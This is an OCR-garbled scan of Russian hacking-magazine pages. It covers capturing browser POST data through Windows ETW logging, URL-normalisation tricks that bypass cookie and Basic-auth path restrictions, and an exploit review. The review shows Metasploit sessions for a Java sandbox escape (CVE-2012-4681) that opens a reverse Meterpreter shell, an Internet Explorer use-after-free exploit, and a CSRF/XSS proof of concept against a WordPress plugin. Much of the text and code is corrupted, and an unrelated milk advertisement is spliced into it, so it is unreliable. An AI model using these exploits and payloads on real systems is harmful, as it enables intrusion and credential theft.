Місгово-РІі-ІлІіпсІоыБ-ІлІіпІпеІ: -о соокіеБІіеаІ . е^І -е1:5 

• зіагі — запустить логированние; 

• СоокіеБІеаІег — любое имя для сіаіа соііесіог'а; 

• -р МісгозоК-ѴѴіпсІоѵѵз-ѴѴіпІпеІ — имя провайдера для сбо- 
ра логов; 

• -о — куда сохраняем итог; 

• -еІ5 — отправлять команды напрямую в Еѵепі Тгасе 
Зеззіопз. 

2. Ищем необходимую информацию: 

іл/еѵЬігЬіІ це с:\1:етр\соокіе5І:еа1.е1:1 /1^'Лгие | бпсі /і \ 
"Р05Т" 



• ѴѴеѵІиІіІ — штука для просмотра логов; 

• яе — выводить еѵепі'ы лога; 

• с:\Іетр\соокіе5ІеаІ.еІІ /К:1гие — использовать лог-файл 
+ путь к нему; 

• НпсІ /і "РОБТ" — что ищем, используя стандартную коман- 
ду ЯпсІ. 



ОБХОД РАТН РЕ5ТРІСТЮЫ5 



3. Выключение логирования: 

1о§тап БІіор СоокіеБІіеаІег 

4. Вывод списка провайдеров: 

1о§тап циегу ргоѵісіегз 

Попробовав данную штуку, я, как и авторы, хотел выдернуть свои 
пароли от дтаіі'а. Но странное дело — я не нашел там данных 
Р05Т-запросов. II РІ_ есть, куки есть, а данных — нет. У них это по- 
лучилось, а у меня — нет. Непонятно... Но данная тема — не моя, 
мог и скривить где-то. Подробнее и с удачными примерами ты 
можешь увидеть на РаиЮоіСот.сот — доо.діЛМпл)і . 

В конце хотелось бы отметить две вещи. Во-первых, как уже 
было сказано, логированию подвержены только приложения, ис- 
пользующие ѴѴіпІпеІ АРІ. Таким образом, используя Орега, СЬготе, 
Рігеіюх, можно чувствовать себя с этой стороны в безопасности. 
Во-вторых, с другой стороны, кроме МісгозоІТ-ѴѴіпсІоѵѵБ-ѴѴіпІпеІ, 
есть множество других провайдеров (см. выше пункт 4), и интерес- 
ностей можно получить от ЕТѴѴ много, так что — присмотрись :). 



ЗАДАЧА 



РЕШЕНИЕ 

Недавно, бороздя просторы Сети в поисках интересностей, 
наткнулся на олдскульную доку, аж от 2006 года ( доо.дІ/Ра2сЦ ). 
Автор — Амит Кляйн (Атіі КІеіп). Несмотря на свою бородатость, 
она вполне себе актуальна с технической точки зрения. Но что 
это я с конца начал... Есть, надеюсь, всем известное понятие 
50Р (вате огідіп роіісіез], относящееся к вебу в целом и к веб- 
браузерам в частности, которое, если по-простому, ограничивает 
взаимодействие различных сайтов, открытых в одном браузере. 

Но кроме этого, возможны ограничения во взаимодействии и раз- 
личных частей одного сайта (или, точнее, домена) в зависимости 
от их расположения, то есть раіЬ. 

Что же здесь подразумевается? Во-первых, имеется возмож- 
ность выставить куки на определенный путь, то есть не на весь 
сайт, а только на какую-то его часть. Например, если поставить 
куку на ѵѵѵѵѵѵ.ехатріе. сот/асітіп/, то браузер будет отправлять 
куку на сервер, только если юзер попытается зайти на ѵѵѵѵѵѵ. 
ехатріе.сот/асітіп/ или глубже, например ѵѵѵѵѵѵ.ехатріе. сот/ 
асІтіп/Ыа-ЫаЬЛеБЕрЬр. 

Во-вторых, естьтакая вещь, как Вазіс-аутентификация, суть ко- 
торой втом, что, когда юзерхочетзайти в какую-то частьсайта, веб- 
серверему возвращает ответ«НТТР/1.1 401 АиіЬогігаІіоп РецііігесІ». 
Далее браузер говорит пользователю: а введи-ка логин и пароль. 
Юзер вводит, а браузер помещает эти данные в за головок запросов к 
веб-серверу в формате «АиіЬогігаІіоп: Вазіс » + Ьазе64(имя: пароль). 

; -ш ж 

іМ 4Ж 




■ іТіІ [іі ^ечіУ ' 

С«ші іжі ІШ 

Г.іиниі-ГіѴЬ. чі„г М#| 

■ ніеі>-*-н-гіі ’Е и 
]>Итпі4<И- ІПЩ 

Шт г И 



міішм, «'«г 



Правила здесь примерно аналогичные — данный заголовок будет 
послантолько на директорию, в которой был выставлен или более 
глубокую. Ноздесьстоитотметить, что когда веб-сервер отвечает 
первой ошибкой 401, он также сообщает некий идентификатор для 
аутентификации «геаіт» в заголовке ответа. Например, ѴѴѴѴѴѴ - 
АиіЬепІісаІе: Вазіс геаІт= м сІ5со м . 

На самом деле изначальной задачей являлось то, что нужно 
было получить доступ к кукисам/Вазіс-заголовку некой части сай- 
та ѵѵѵѵѵѵ.ехатріе. сот/асітіп/, если мы имеем Х55 в другой его ча- 
сти — ѵѵѵѵѵѵ.ехатріе. сот/риЫіс/. 

Но предлагаемый автором метод уже невозможен, получение 
доступа к заголовкам сервера через ТРАСЕ-метод невозможно 
(из браузера запрос с данным методом не отправить). Хотя куки 
еще получить, по идее, можно, если открыть админку в фрейме и 
добавить в нее кусок 35 посредством 35 из родителя — паблика. 

На деле не пробовал, но сработать должно :). Здесь хотелось бы 
выделить кое-какие интересные тонкости. Во-первых, куки. Как 
это ни странно, у нас нет ограничений на запись. То есть если ответ 




Кука установлена на путь /Ьаг/ 



Подменяем ответ от/азсіавсі/ на запрос аутентификации с реалом от герогі 
и получаем Вазіс-заголовки без запроса к пользователю 
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НТТТЧ.О 



Ва5Іс-аутентификация установлена на путь /герогі/ 



гечиеаі гсзрапзе 



гят ранила [ Ьвагіаге [ Ивк 



6ЕТ /Ъ*Г/ЬЛ2Ѵ5С. .\ЬС. ./*ао/ НТТР/і.і 

Ноэс: 1?:.1€.0,; 

Г94С-Ад*ІК ! ПО2І1ІА/5.0 ѴІПООѴЭ ІГГ &. 1і ЕѴІІЬ.ОІ 04СЖ/І010010І Г ІІіШ/ 15,0* 1 
Асс«рЬ : «хІ/ІКпІгА^ІІсйЫсп/хЫпіІ+хікІіАррисйІіоп/хпіІ^'О.?, Ѵ*;<гО.В 
Лес*рс-імідиад* : сч-г«,і:и;ч-о.о,«і-ив?<і и 0.5, «і;ч и О. ? 

Лесерс-Еішйііііщ: О-ір» <1«С1 ас« 

Рюху-Сопп'ссюп: к««р-4Ііѵг 

Совкіе: ЗЕ35 ІОНСООКТЕ=Ьа1і*]іа]іл 



Простой трик с обратными слешами под ѴѴіп, и Ьаг-куки отправляются на Тоо 

от риЫіс будет содержать строчку о том, что надо поставить куку 
на часть асітіп, то браузер это с радостью проглотит. Во-вторых, 
смотри далее, так как это общий с Вазіс пункт :). 

Теперь Вазіс. Здесь самым интересным является то, что Вазіс 
не привязывается к конкретному пути, точнее привязывается, 
но не только к нему. Основополагающим элементом, из-за кото- 
рого браузер отправляет запросы с аутентификацией, является 
реалм. То есть если юзер аутентифицировался на ѵѵѵѵѵѵ.ехатріе. 
сот/абтіп/, то браузер отправит и на ѵѵѵѵѵѵ.ехатріе. сот/абтіп/ 
Ыа-ЫаЬДезІ.рЬр соответствующий Вазіс-заголовок, как уже было 
сказано. Но в то же время если, зайдя браузером на ѵѵѵѵѵѵ.ехатріе. 
сот/риЫіс/, последний отправит юзеру ошибку401, а главное — 
правильный реалм (то есть тот, что был в асітіп), то браузер 
автоматом отправит аутентификацию от асітіп. Имхо, интересный 
факт. 

Но и это еще не все! Как раз второй пункт, общий и для соокіе, 
и для Вазіс-аутентификации. У нас есть возможность обмануть 
браузер пользователя и вынудить его послать критические 
данные на риЫіс, за счеттого, какой запрос мы посылаем. То есть 
мы должны сформировать такой запрос, который казался бы 
браузеру запросом к асітіп, а после его обработки и нормализа- 
ции веб-сервером получался бы запрос к риЫіс. Звучит, может, 
невероятно, но посмотри на примеры, и все станет на свои места. 
Сразу отмечу, что варианты привязаны к версии браузера и типу 
веб-сервера. 



1) ѵѵѵѵѵѵ.ехатріе. сот/асІтіп/%2е%2е/риЫіс/ \ 

(ІЖІ_-епсосІесІ 

Большинство веб-серверов обработают как риЬНс, 

ІЕ - ок. РР - канонизирует до ѵѵѵѵѵѵ.ехатріе. сот/риЬІіс/ 
перед отправкой на сервер. 

2) ѵѵѵѵѵѵ.ехатріе. сот/асІтіп/Ьа 2 \. Д. . /риЫіс/ 

Большинство веб-серверов под Ілііпсіоѵѵз обработают как 
риЬІіс^ІЕ - канонизирует, РР - ок. 

3) ѵѵѵѵѵѵ.ехатріе. сот/асІтіп/%и002е%и002е/риЫіс/ (ІЯР-8) 

115 - должен обработать, ІЕ, РР - ок. 

4) ѵѵѵѵѵѵ.ехатріе. сот/асІтіп%с0%ае%с0%ае/риЫіс/ (Оѵег1оп§ \ 

ІГГР-8) 

115 - должен обработать. ІЕ. РР - ок. 

5) ѵѵѵѵѵѵ.ехатріе. сот/асІтіп/%252е%252е /риЫіс/ (РоиЫе- \ 

епсосіесі сіоі) 

115 - должен обработать, ІЕ, РР - ок. 

В общем, главная проблема здесь — канонизация запросов, 
которую проводит браузер перед отправкой их на сервер. Если 
получится ее обмануть или найти сговорчивый веб-сервер, то все 
тип -топ :). Прямого практического применения у этих тонкостей 
не наблюдается, но вот в связке с другими уязвимостями — можно 
получить неплохой профит. 

Вот и все. Надеюсь, что было интересно :). Успешных ресерчев и 
познаний нового! 
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>нтп*чч~ 



Воя продукция -ТЕѲЬЕ МОЛОЧНИК- произведена из цельного 
{не восстановленной?) молока Очень ѲЫООкОгО качества. 
Такой строгий контроль оказывается важным и для людей,, 
заботящийся о здоровье, поскольку а последнее время ни рынке появилось 
^^^^вдш^удделок и разбавлений как молока, так и продуктов щщр* 







ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроСсот) 
Дмитрий Михайлович (115612, дер. Красная звездочка, д. 1] 




х86-инструкций ряд нестройный 
В процессорльется бурным селевым потоком. 
Внезапно существо мое пронзает словнотоком 
Представшая пред взором неспокойным 
Ошибка доступа на запись. 

Что ж, будем в баге разбираться... 

Пора попкорном запасаться. 

Удобнее на стул садись, 

Читай же нашу летопись! 



Обзор 

эксплойтов 



АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



0-сІау^ѵа5Е 

СѴЕ-2012-4681 



СѴ55Ѵ2 10.0 



(АѴ:Ы/АС:І_/АІІ:І\І/С:С/І:С/А:С) 

ШІ=Ы 

Дата релиза: 26 августа 2012 года 

Автор: МісЬаеІ БсЬіегІ, ісі иск, 5ІппЗг,щап ѵагциег 

СѴЕ: СѴЕ-2012-4681 

При работеэксплойтиспользуетдва нововведения, входящихв 
состав ЭйК 7: СІаззРіпсІег и МеШосІРіпсІегТіпсІМеШосіО. СІаззРіпсІег 
представляет собой за мену для сІаззРогМате, используемого 
вЭОКб.В результате недоработок в плане безопасности он по- 
зволяет недоверенному коду получить ссылку на служебный пакет 
изЭ0К7(вданном случае используется зип.аѵѵСВипТооІкіІ:). 

При помощи зип.зѵѵСБипТооІкіІ: вызывается риЫіс- метод 
деіРіеІсіП для того, чтобы получить доступ к приватному полю 
Біаіетепі.асс, модифицировать АссеззСопІгоІСопІехІ, а затем 
отключить менеджер безопасности. Как только менеджер без- 
опасности будет отключен, появляется возможность исполнять 
произвольный Эаѵа- код. 



ЕХРЮІТ 



Перед выполнением большинства операций в ЭйК осуществля- 
ется проверка правдоступа. Всякий раз, когда происходит вызов 
метода Іаѵа.зесигіІу.АссеззСопІгоІІег.сЬескРегтіззіоп, выпол- 
няется полный анализ текущего стека вызовов. В случае если на 
стеке вызовов содержится хотя бы одна из вызывающих функций, 
не обладающая требуемыми привилегиями, происходит генера- 
ция исключения. 



С учетом того факта, что апплет при запуске наделяется крайне 
ограниченными правами доступа, получим, что если при проверке 
методом Іаѵа.зесигіІу.АссеззСопІгоІІег.сЬескРегтіззіоп на стеке 
вызовов имеется хотя бы одна функция из апплета, то подобная 
проверка прав доступа завершится неудачей (если, конечно, 
нет блока кода боРгіѵіІедесІ). 

Суть работы эксплойта состоитвтом, чтобы создатьэкземпляр 
класса іаѵа.зесигіІу.АссеззСопІгоІСопІехІ с использованием]аѵа. 
5есигіІу.РгоІесІіоп0отаіп, имеющего неограниченные права до- 
ступа, а затем подменить АссеззСопІгоІСопІехІ экземпляра класса 
]аѵа.Ьеапз.5іаІетепІ, дабы получить возможность исполнения 
кода с полными привилегиями. 

Окинем взглядом реализацию класса іаѵа.Ьеапз.БіаІетепІ и 
увидим, что экземпляр АссеззСопІгоІСопІех* представляет собой 
приватное финальное поле, получающее свое значение путем вы- 
зова АссеззСопІгоІІег.деіСопІехШ: 
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риЫіс сіэбб БТаТетепТ { 



ргіѵаіе Біаіііс ОЬі есі: [ ] етрІіѵАпгаѵ = пеы ОЬзесЬ [ ] { }і 



вііаіііс Е хсерТіопІ-ІБІіепег с!е-Раи11іЕхсер1:іопІ.І5Ііепег = пеы \ 
ЕхсерТіопІ-ІБІіепегО { 

риЫіс ѵоісі е хсерТіопТІігошпРЕхсерІііоп е) { 

БуБТет.егг. ргіпТІп(е) ; 

БуБТет.егг. ргіпТІпГ'СопІііпиіп ^ ..."); 

} 



ргіѵаТе бпаі АссеББСопТгоКопТехТ асе = \ 
АссеББСопТгоІІег . ^еТСопТехТ ( ) ; 
ргіѵаііе бпаі ОЬдесТ Таг§еТ; 
ргіѵаііе бпаі 5Тгіп§ теТбосІІМате; 
ргіѵаііе бпаі ОЬдесТП аг^итепТБ; 
С1а55І_оасІег Іоасіег; 



ь_ 

Вызов метода деіСопіехіО устанавливает АссеззСопігоІСопІіехІ: 
в контекст апплета, не обладающего практически никакими при- 
вилегиями. 

Теперь перед нами встает вопрос, каким же образом можно из- 
менить значение приватного поля. Весь трюк состоит в том, чтобы 
воспользоваться классом зи п.аѵѵі.Би пТоо I кіі, который содержит 
весьма интересный статический риЫіс- метод: 

риЫіс Бііаіііс Г іеісі §еТРіе1сІ(бпа1 Сіазз кіазз^ бпаі \ 
5Тгіп§ бе1сІІ\Іате){ 

геТигп АссеББСопІігоІІег .сІоРгіѵіІе^е сКпеш \ 
Ргіѵі1е^есІАс 1ііо п<Р іе1с І>0{ 



риЫіс Ріеісі гип(){ 

Ьгхі 

Ріеісі беіеі = к1а55.§е1і0ес1агесІРіе1сІ(бе1сІІ\Іате); 
аззегі! (беіеі != пиіі); 
б еіеі . б еІіАс с е б б і Ы е(Тгие) ; 
геТигп б еіеі; 

} 

саТсб ( БесигіТѵЕхсерІііоп е){ 
аББегІі -РаІБе; 

} 

саТсб ( ІМоБисбРіеІсІЕхсерІііоп е){ 
аББегІі -РаІБе; 

} 

геТигп пиіі; 

} 

})^_ 

Ь_ 

Таким образом метод деіРіеІсІ может использоваться для полу- 
чения любого класса, и, что самое прекрасное, даже приватного. 

Однако стоит отметить, что классы, являющиеся частью слу- 
жебных пакетов, запрещены для апплетов, то есть ссылку на них 
нельзя получить и, соответственно, их никоим образом нельзя 
использовать в своих коварных целях. К подобным пакетам от- 
носятся: 

• сот.зип.сіеріоу.* 

• сот.зип.ітадеіо.* 

• сот.зипдаѵаѵѵз.* 

• сот.зипдпір.* 

• сот.зип.хтІ.іпІегпаІ.ЬіпсІ.* 

• сот.зип.хті.іпіегпаі.ѵѵз.* 

• зип.* 



При попыткесоздатьэкземпляр класса или использовать 
классы перечисленныхпакетов произойдетгенерация исключения 
АссеззСопІтоІЕхсербоп. Но нестоитотчаиваться, поскольку суще- 
ствует возможность произвести вызов к определенным методам, 
в результате чего проверки менеджера безопасности пропустят нас. 

В своей реализации эксплойт использует класс ]аѵа.Ьеапз. 
Ехргеззіоп, являющийся подклассом класса Іаѵа.Ьеапз.БіаіетепІ;. 

Вызов метода Ехргеззіоп. ехесиіезаканчивается переда- 
чей управления на Зіаіетепі.іпѵокеІ піегпаі. В свою очередь, 
Біаіетепі.іпѵокеІ піегпаі вызывает по ходу работы сот.зип.Ьеапз. 
ііпсІег.СІаззРіпсІег. гезоІѵеСІагз, который завершается вызовом 
метода сот.зип.ЬеапзТіпсІег.СІаззРіпсІегТіпсІ Сіазз: 

риЫіс Бііаіііс С1а55<?> пеБОІѵеС1а55(51ігіп^ пате, \ 

СІаББІоасІег Іоасіег) Тбгомз СІазБІМоІіРоипсІЕхсерІііоп { 
С1а55<?> Туре = РгітіТіѵеТуреМар.§еТТуре(пате) ; 
геііигп (Туре == пиіі 1 ) ? бпсІС1а55(пате. Іоасіег): Туре; 

} 



риЫіс Бііаіііс С 1а55<?> бпсІС1а55(БТгіп§ пате) Тіігомб \ 
СІаззІМоТРоипсІЕхсерТіоп { 

Ш- { 

СІаББІоасІег Іоасіег = ТбгеасІ. сиггепТТбгеасК) . \ 
§еТСопТехТС1а5 5І_оасІег( ) ; 

і-р (Іоасіег == пиіі) { 

Іоасіег = СІаББІоасІег. §еТБу5ТетС1а55І_оасІег(); 

} 

ІТ ( Іоасіег ! = пиіі) { 

геТигп СІЭ55 . богІМате( пате . -РаІБе. Іоасіег); 

} 

} 

саТсб (СІаззІМоТРоипсІЕхсерТіоп ехсерТіоп) ^ 

// иБе сиггепіі сіэбб Іоасіег іпзТеас! 



саТсб (БесигіТуЕхсерТіоп ехсерТіоп) { 
// иБе сиггепТ сіэбб Іоасіег іпБІіеасІ 

-Ь- 



геііигп Сіазз .ТогІМате(пате) ; 

Ь- 

Из кода видно, что если ловится исключение, то по умолча- 
нию производится вызов метода СІаззТогЫаппе, и это именно 
наша ситуация. Вызов к Сіазз. іюгІМа те кладет на стек вызовов 
СІаззІ-оасІег, являющийся частью ^ О К, поэтому, в связи с тем что 
на стеке вызовов у нас находится доверенный вызов, проверка 
безопасности проходит успешно. Все это позволяет нам полу- 
чать ссылки на произвольный класс произвольного пакета, чем 
мы и воспользуемся для получения ссылки на зи п .аѵѵі.Зи пТооІ кИ;. 

Теперь у нас есть ссылка на нужный класс, но мы все равно пока 
не имеем возможности вызывать напрямую произвольные методы 
из этого класса, поскольку они являются частью служебного пакета 
и при вызове произойдетгенерация исключения. Суть обхода этой 
неприятной ситуации осталасьтойже, что и в предыдущем случае. 

Зіаіетепіі.і пѵокеіпіегпа I, упоминавшийся ранее, содержит вы- 
зов к методу сот.зип.Ьеапз.РіпсІег. МеіЬосІРіпсІег.РіпсІМеіЬосІ: 

риЫіс Бііаіііс МеТбосІ бпс1МеТбос1(С1а55<?> Туре. Біігіп^ \ 
пате. С1а55<?>. . .аг§з) ііИгоыб ІМоБисбМеТбосІЕхсерТіоп { 



теТбосІ = бпсІАссе55ІЫеМеТбосІ(пе№ МеТбосІРіпсІег(пате., \ 
аг§5 ) . бпсі (Туре . §еТМеТбосІ5 ( ) ) ) ; 
САСНЕ.риТ(5І§паТиге., теТбосІ); 



г теТбосІ; 
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Вызов к и псІАссеззіЫеМеіИосІ завершается передачей управ- 
ления на іаѵа.Іапд.СІазз.деМеііЬосІз. На стеке вызовов в этот 
момент будет находиться сот.зип.ЬеапзХіпсІег.МеіЬосІРіпсІег, вхо- 
дящий в состав ЭйКи, соответственно, являющийся доверенным, 
поэтому снова имеем обход проверки безопасности. 

Итак, краткий план работы эксплойта: 

• создается экземпляр класса Біаіетепі, который вызываетметод 
БузІет.зеіБесигіІуМападегІпиІІ); 

• создается специальный АссеззСопІгоІСопІехІ с неограниченны- 
ми правами доступа; 

• при помощи первой баги получается ссылка на класс зип.аѵѵі 
БипТооІкіІ; 

• при помощи второй баги вызывается статический риЫіс-метод 
деіРіІеб и получается ссылка на приватное полеБіаІетепІ.асс, 
значение поля устанавливается в ранее созданный специальный 
АссеззСопІгоІСопІехІ; 

• в завершение вызывается Біаіетепі, что приводит фактически 
к отключению менеджера безопасности, поскольку теперь в 
АссеззСопІгоІСопІехІ содержатся неограниченные права доступа. 

Пример использования соответствующего модуля из состава 
Меіазріоіі: 

тз-Р > изе ехр1оіі/ти1іі/Ьгомзег/даѵа_эге17_ехес 
тз-Р ехр1оіі(эаѵа_э'ге17_ехес) > зеі игіраіЬ ехт 
игіраіЬ => ехт 

тз-Р ехріоіі (іаѵаіге17ехес') > зеі: раѵіоасі \ 
іаѵа/теіегргеіег/геѵегзе _~Ьср 
раѵіоасі => даѵа/теіегргеіег/геѵегзеіср 
тз-Р ехр1оіі(эаѵа_з'ге17_ехес) > зеі: ІЬозі 192.168.0.123 
ІИоз-І: => 192.168.0.123 

тз-Р ехріоіі ( д а ѵа_] ге!7_ехес ) > зЬом оріііопз 



Мосіиіе оріііопз (ехрІоіі/тиІіі/Ьгомзег/іаѵа іге!7 ехес) : 



Мате Сиггепі Беіііп^ КедиігесІ Резсгіріііоп 



БКѴНОБТ 0.0. 0.0 уез ТЬе Іосаі Ьозі 

Іо Іізіеп оп. 

ТЬіз тизі Ье ап 
асісігезз оп ІіРіе Іосаі 
тасНіпе ог Ѳ.Ѳ.Ѳ.Ѳ 

5КѴРОКТ 8080 уез ТЬе Іосаі рогі 

іо Іізіеп оп. 



55Б -Раізе по І\Іе§оііаіе 55І_ -Рог 

іпсотіп§ соппес ііі опз 

БББСегі по РаіЬ Іо а сизііот 55Б 

сегіібсаіе (сІе-РаиІі 
із гапсіотіу §епегаіесІ) 
БББѴегзіоп 55БЗ по Бресі-ру іЬе ѵегзіоп о-р 

55Б іЬаі зЬоиІсІ Ье изесі 
(ассеріесі: 5ББ2. 

55БЗ, ТБ51) 

БІКІРАТН ехт по ТЬе БІКІ іо изе -Рог 

іЬіз ехріоіі: (сІе-РаиІі 
із гапсіот) 



Раѵіоасі орііопз Маѵа/теіегргеіег/геѵегзеіср) : 



Мате Сиггепі 5еіііп% КедиігесІ Резсгірііоп 



БНОБТ 192.168.0.123 уез ТЬе Іізіеп асісігезз 

БРОКТ 4444 уез ТЬе Іізіеп рогі 



Ехріоіі іаг§еі : 



ІсІ ІМате 



0 бепегіс (Заѵа РаѵІоасП 



тз-Р ехріоіі (даѵа_дге17_ехес) > ехріоіі 
Ц*] Ехріоіі гиппіп§ аз Ьаск§гоипсІ доЬ. 



[?] БіагіесІ геѵегзе ЬапсІІег оп 192.168.0.123:4444 
[*] Цзіпе ЦКБ: Ьіір : //0 . 0 . 0 . 0 : 8080/ехт 
[*] Босаі ІР: Ьіір: //192. 168.0. 123 :8080/ехт 
[*] Бегѵег 5іагіесІ. 

На уязвимой машине заходим по Ыір://1 92.1 68.0.1 23:8080/ехт, 
атакующий исполняет победный танец с бубном. Занавес. 



ТАК6ЕТ5 



Огасіе ЭБЕ (Эаѵа 5іа псіа гсі ЕсІіііоп) версий 1 .7.0_06-Ь24 и меньше. 



зонтом 



Существует обновление, устраняющее да иную уязвимость. 



ГП-5І Г-кр 1 й ] \ і 


.г 1 он • .і > зез 5 1 впз 




Ас*. 1 у* *#**|.апіс 


[ 6 Гурр 


1 піі а-г^іЛ 1_ і оп 


Сснігѵрсі] ап 








1 №І«рГВгІбГ 


к$б/шім32 эи-РС\рЁ^.еРвг аи Б Р1 КОРЙ&ЯС'-РС 


192:166. 0,91:4444 192. 166,6,91; 56747 <16.6.2. І5> 


гр =•( е-рЗоіІі 


_ |геІ7_емсс ) > аез-зіеіпз -і 1 




[-1 Бівгііпд Іпіегасііоп ыІіЬ 1. 








Со^-.р^іег 


РІШГЙРЯ0-РС 




□ Б і 


ИІпЛш5 7 і'Віііігі 7С-Е1Ѳ 5 




Яггін ^р-гімге 






Йуяінті Бппдиад^ : 


еп.иЗ 




ГГргргргрІег 


кЙб/ыіпЗ 2 





Сессия Меіегргеіег'а получена для СѴЕ-201 2-4681 
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О-сІау уязвимость типа изе-аНег-Ггее 
в функции ехесСоттапсІ в ІЕ 



СѴ55Ѵ2 



9.3 



ІсІ ІМате 



5 ІЕ 8 оп ілііпсіоыб 7 



( АѴ : N /АС : М/АЦІ : N /С : С/ 1 : С/А : С ) 

М;ІМД 

Дата релиза: 18сентября 2012 года 

Автор: ипкпоѵѵ, еготапд, Ьіщо, зіппЗг, щап ѵагциег 

СѴЕ: С ѴЕ-20 1 2-4969 



тз-Р ехр1оі1:(іе_ехессоттапсІ_иа-р) > ехріоіі 
Ехріоіі: гиппіп§ аз Ьаск§гоипсІ доЬ. 



[*] Ц5іп^ ЦКІ.: Ьіір : //0 . 0 . 0 . 0 : 8080/ехт 
[*] І.оса1 ІР: Ьіір : //192 . 168 . 0 . 123 : 8080/ехт 
[*] Бегѵег зіагіесі. 



Данная уязвимость была обнаружена іп-іЬе-ѵѵіІсІ 14 сентября 2012 
года, и пока что для нее не существует официального патча. 

В процессе рендеринга НТМЬстраницы происходитудаление 
объекта СМзЫтІЕсІ, позже выделенная под него память повтор- 
но используется вфункции СМзЫ:тІЕсІ::Ехес(), что и приводитк 
уязвимоститипа изе-аііег-ігее. 



ЕХРЮІТ 



Пример использования модуля для данной уязвимости изсостава 
Меіазріоіі: 

тз-Р > изе ехрІоіІі/ыіпсІоыз/Ьгоызег/іе ехессоттапсІ иа-Р 
тз-Р ехріоіі: (іе_ехессоттапсІ_иа-Р) > зеі игіраіЬ ехт 
игіраіЬ => ехт 

тз-Р ехріоіі: (іе_ехессоттапсІ_иа-Р) > зеі іаг§еі 5 
іаг§еі => 5 

тз-Р ехріоіі: (іе ехессоттапсі иа~И > зеі: раѵіоасі ыіпсіоыз/ехес 
рауіоасі => міпсіомз/ехес 

тз-Р ехріоіі: (іе_ехессоттапсІ_иа-Р) > зеі: стсі саіс.ехе 
стсі _=> саіс.ехе 

тз-Р ехріоіі: (іе_ехессоттапсІ_иа-Р) > зЬом орііопз 



Мосіиіе орііопз (ехрІоіі/міпсІоіл/з/Ьгоызег/іеехессоттапсІиаЯ : 



Мате Сиггепі 5еіііп§ КедиігесІ Резсгірііоп 



БКѴНОБТ Ѳ.Ѳ.Ѳ.Ѳ уез ТЬе Іосаі Мозі: 

іо Іізіеп оп. ТЬіз 
тизі Ье ап асісігезз 
оп іЬе іосаі тасЬіпе 
ог 0.0. 0.0 

5КѴРОКТ 8080 уез ТЬе іосаі рогі 

іо Іізіеп оп. 

55І_ іаізе по І\Іе§оііаіе 55І_ іог 

іпсотіп§ соппесііопз 

5БІ-Сегі по РаіЬ іо а сизіот 55І_ 

сегіібсаіе (сіе-РаиІі 
із гапсіотіу §епепаіесІ) 

ББІѴегзіоп 55І_3 по Бресііу іЬе ѵепзіоп оі 

55І_ іЬаі зМоиІсІ Ье 
изесі (ассеріесі: ББІ_2., 
ББІ_3, ТІ_Б1) 

ІЖІРАТН ехт по ТЬе ІЖІ іо изе -Рог 

іЬіз ехріоіі (сіеіаиіі 
із гапсіот) 



Рауіоасі орііопз (ыіпсіоыз/ехес) : 



ІМате Сигпепі Беіііп^ КедиігесІ Резсгірііоп 



СМР саіс.ехе уез ТЬе соттапсі зігіп§ 

іо ехесиіе 

ЕХІТРІІІМС ргосезз уез Ехіі іесЬпідие: зеЬ., 

іЬгеасД ргосезз^ попе 



Ехріоіі іаг^еі : 



На уязвимой машине пользователь переходит по 
Ы1р://192.168.0.123:8080/ехт и видитзапускающийся калькулятор. 



ТАРСЕТ5 



Місгозоіі Іпіегпеі Ехріогег 6—9. 



боютіоы 



Обновлений пока что не существует, та к что лучше ІЕ не использо- 
вать. 

3 Множественные уязвимости 
в ѴѴогсІРгеББ ѴѴР-ТорВаг 



СѴЗЗѴ2 6.0 



(АѴ: И/АС: М/Аи:5/С:Р/І: Р/А: Р] 

ЩЩ 

Дата релиза: 13 сентября 2012 года 
Автор: ВІаке Епігекіп 

В плагине ѴѴР-Тор Ваг были найдены уязвимости типа С5РР (под- 
делка межсайтовыхзапросов) и зіогесі (хранимая, также известна 
как активная) Х55, при эксплуатации которых становится возмож- 
ным изменять настройки плагина произвольным образом, а также 
завладеть аккаунтами пользователей. 



ЕХРЮІТ 



1. С5РР. Скриптѵѵр-ІорЬаг.рЬр не фильтрует да иные, переданные 
путем Р05Т-за проса, и в результате становится уязвимым для 
атаки С5РР. Пример эксплуатации выглядитследующим об- 
разом: 

<Ьіт1> 

<ЬеасІ> 

<ііі !е > < /ііі 1 е > 

</ЬеасІ> 

< Ьосіѵ > 

<іопт пате^"іезіТогт" асііоп="Ьіірз : //ІосаІЬозі/ \ 
могсіргезз/мр-асітіп/асітіп . рЬр?ра§е=ыр-іорЬаг. рЬр 
&асііоп=іорЬагіеxі&ЬапісI=1 ,, теіЬосІ= ,, Р05Т"> <Ьг> 
<іприі іѵре="ЬісІсІеп" пате="ыріЬЬапіехі" ѵа!ие= \ 
"</зспірі><5сгірі>оп1оасІ=а1егі(3)</5сгірі>"> 
<іприі іѵре="ЬісІсІеп" пате="ыріЫіпкіехі" \ 
ѵа1ие="ыЬаіеѵег"> 

<іприі іуре^'ЬісІсІеп" пате="ыріЫіпкип1" ѵа1ие= А 

"Ьіір%ЗА%2Р%2РыогсІрге5 5 .ог§%2РехіепсІ%2Рр1и§іп5%2 
Рмр-іорЬаг%2Р"> 

<іприі іѵре="ЬісІсІеп" пате="ыріЫіпкіап^еі" \ 
ѵа1ие="Ыапк"> 

<іприі іѵре="ЬісІсІеп" пате="ѵ\/ріЬепаЫеіта%е" \ 
ѵа1ие^-Ра1зе"> 

<іприі іуре= ,, ЬісIсIеп ,, пате="мріЬЬагіта§е" ѵа!ие =" "> 

<іприі іуре="МісІсІеп" пате^ирс^е^р^Бе^^^з" Л 

ѵа1ие= "ІІрсІаіе+5еіііп§5 " > 

</Тогт> 

<зсгірі іуре="іехі/даѵазсгірі"> 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



Соодіе 


ІпиПіаѵуагаз.рПр іпіеиігроѵѵегеа Ьу ѵЬиІіеіігГ 


і 


ЗеагсЬ 


А№НЛ 113.000 «*иІИ «0 ЧР 




1 


Тііе Огд - Ажагй$ 




1 глядев 


ГіоГиггч ,^иІі^.0^ѵЬ<пѵШг{І* г рГір 

ТТЛ О Ьу ѵ0иІІ«]П РйИЮГФй Ьу ѴШМІП 






03000 ■ 2012, вики 1 ! ЕоЫфгѵм* ив ітад$ юяг« су Звѵвгёкіп*. 




ѴМКС 


Азігспсмтнсап ■ ^ѴѴатэттег Рогитз - Аѵѵагйз 




Ил. 1 . ■ -г 

ГчПі?» 

Ног* 


